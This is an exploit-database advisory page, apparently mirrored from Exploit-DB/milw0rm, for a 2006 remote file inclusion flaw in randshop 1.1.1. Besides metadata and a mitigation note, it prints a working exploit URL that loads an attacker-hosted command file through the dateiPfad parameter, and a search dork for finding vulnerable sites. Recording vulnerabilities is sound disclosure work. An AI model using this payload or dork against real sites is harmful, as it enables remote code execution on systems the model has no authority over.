header-logo
Suggest Exploit
vendor:
randshop
by:
OLiBekaS
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: randshop
Affected Version From: 1.1.1
Affected Version To: 1.1.1
Patch Exists: NO
Related CWE: N/A
CPE: randshop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

randshop <= 1.1.1 Remote File Inclusion Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in randshop version 1.1.1 and earlier. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which can allow the attacker to execute arbitrary code on the server. The exploit code is http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls

Mitigation:

Ensure that user input is properly sanitized and validated before being used in any file operations. Also, ensure that the web server is configured to only serve files from a specific directory.
Source

Exploit-DB raw data:

Title       : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL         : http://www.randshop.com/
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
dork        : "software 2004-2005 by randshop"
-
exploit     : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz      : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-

# milw0rm.com [2006-07-01]

Navigation

Suggest Exploit

Services By CQR